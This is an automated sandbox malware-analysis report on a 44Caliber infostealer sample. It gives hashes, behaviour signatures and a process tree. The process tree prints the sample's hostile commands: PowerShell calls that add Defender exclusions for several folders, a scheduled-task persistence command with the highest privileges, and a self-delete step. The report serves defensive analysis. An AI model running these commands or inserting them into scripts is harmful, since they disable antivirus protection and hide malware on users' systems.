Overview

overview

10

Static

static

3

54b1da1c16...93.exe

windows7-x64

10

54b1da1c16...93.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-12-2023 04:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    54b1da1c16d8dd8c121c95eaa705aa93.exe

  • Size

    212KB

  • MD5

    54b1da1c16d8dd8c121c95eaa705aa93

  • SHA1

    95ea8c091e1550778ced92f61e795e071e3f25fe

  • SHA256

    37a2d60c1263d20fcbe71038314073e0c9b40cbc0eef31fd05eca9e53be93c75

  • SHA512

    570f620a7dade80891189dfad95c514da5f93ca2e650ebba6f72a18201db52252fc03b9bc77370445f2f62b5e903d68f39ba655b2ad453f22cb8ef243b853a2b

  • SSDEEP

    6144:K8x1Nj/T9iK4Lpu6HPirxW+26NU7NBsp7:X1X4Lo6wxW+26NU7NBsp7

Score
10/10
44caliberspywarestealer

Malware Config

Signatures

  • 44Caliber

    An open source infostealer written in C#.

    stealer44caliber
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\54b1da1c16d8dd8c121c95eaa705aa93.exe
    "C:\Users\Admin\AppData\Local\Temp\54b1da1c16d8dd8c121c95eaa705aa93.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe
      "C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"
        3⤵
          PID:4076
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3512
      • C:\Users\Admin\AppData\Local\Temp\1.exe
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        2⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3492
    • C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
      1⤵
      • Creates scheduled task(s)
      PID:2348
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      1⤵
        PID:4300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:208
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:3684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
          1⤵
            PID:4376
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2644
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3356
          • C:\Windows\servicing\TrustedInstaller.exe
            C:\Windows\servicing\TrustedInstaller.exe
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:4076
          • C:\Windows\System32\sihclient.exe
            C:\Windows\System32\sihclient.exe /cv zTMrO3tQME66NF5t4E6w3g.0.2
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4376
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4300

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\1.exe
            Filesize

            274KB

            MD5

            c23dd6dcde8637fd537eb142665a4edf

            SHA1

            ac1d3a691cdd37a8935734270e62186ae0c8f563

            SHA256

            3cd8c058466febed909675da97645ff2c364562a2bab260402185896aea8be59

            SHA512

            b16a7badf694741ddfe519d96418c36a12a315523c8045c60ff1af68886f377d3818c0346fb2ab9292182831869207b7219aad3dc27e37ee95372e59fa886bb7

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe
            Filesize

            42KB

            MD5

            84cc0c40b8c1a3a5366d30e0c038bddc

            SHA1

            36a5f937988d9d2e8109885f1cc172abeca7c974

            SHA256

            5076d9fd2781dcfcb98b71ffa8b9bebab8c11499caf1af17a28e2b661853848c

            SHA512

            a23863de886c23df57dfd038dd7b9cc6a2c7ffcb48e555db8a71155de59f1dbb2fb412fdf1b5610e37e9011450d4adcf829947317901fd93ffa246f2aaac59a2

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xtl04w3g.3jw.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
            Filesize

            36KB

            MD5

            1aa155e87018118aa94dcdad5e8bb3ee

            SHA1

            f3d9f7935170538f4219731aa27664dfd5fb6cc0

            SHA256

            7ac2a4b82c31b61fb520f69c33674247e75acbf2c93b7357edb7a62e443e475e

            SHA512

            8df2f7accb24dee4b3acc73fad33fd2adfc3988766c995efb52f677b9b81baeea243aa5c8a1c8596cc68269795017c7903faa3c372a3d8e2da791b0c6d2e11be

            Download Submit

          • memory/208-228-0x000001BD35D80000-0x000001BD35D90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/208-229-0x000001BD35D80000-0x000001BD35D90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/208-227-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/208-231-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/452-66-0x0000000000920000-0x0000000000930000-memory.dmp

            Filesize

            64KB

            Download

          • memory/452-128-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/452-163-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/740-177-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/740-170-0x00000000018F0000-0x0000000001902000-memory.dmp

            Filesize

            72KB

            Download

          • memory/740-167-0x0000000000B20000-0x0000000000B2E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/740-183-0x0000000003180000-0x0000000003190000-memory.dmp

            Filesize

            64KB

            Download

          • memory/740-339-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1100-179-0x00000252A0AC0000-0x00000252A0AD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1100-168-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1100-169-0x00000252A0AC0000-0x00000252A0AD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1100-187-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1100-176-0x00000252B8E30000-0x00000252B8E52000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2032-203-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2032-213-0x000001D5FAE20000-0x000001D5FAE30000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2032-216-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2036-404-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2036-338-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2644-351-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2644-355-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2644-353-0x0000024035F00000-0x0000024035F10000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3432-398-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3432-399-0x000001324FB40000-0x000001324FB50000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3432-403-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3432-401-0x000001324FB40000-0x000001324FB50000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3492-340-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3492-130-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3492-127-0x0000000000C40000-0x0000000000C8A000-memory.dmp

            Filesize

            296KB

            Download

          • memory/3492-341-0x000000001B830000-0x000000001B840000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3492-141-0x000000001B830000-0x000000001B840000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3492-400-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4300-202-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4300-199-0x0000023E950B0000-0x0000023E950C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4300-189-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4376-385-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4376-383-0x0000026843960000-0x0000026843970000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4376-382-0x0000026843960000-0x0000026843970000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4376-381-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4484-370-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4484-367-0x000002BC98470000-0x000002BC98480000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4484-366-0x000002BC98470000-0x000002BC98480000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4484-365-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4680-0-0x00000000003D0000-0x000000000040E000-memory.dmp

            Filesize

            248KB

            Download

          • memory/4680-129-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4680-3-0x000000001B0C0000-0x000000001B0D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4680-1-0x0000000000BB0000-0x0000000000BB6000-memory.dmp

            Filesize

            24KB

            Download

          • memory/4680-2-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

            Filesize

            10.8MB

            Download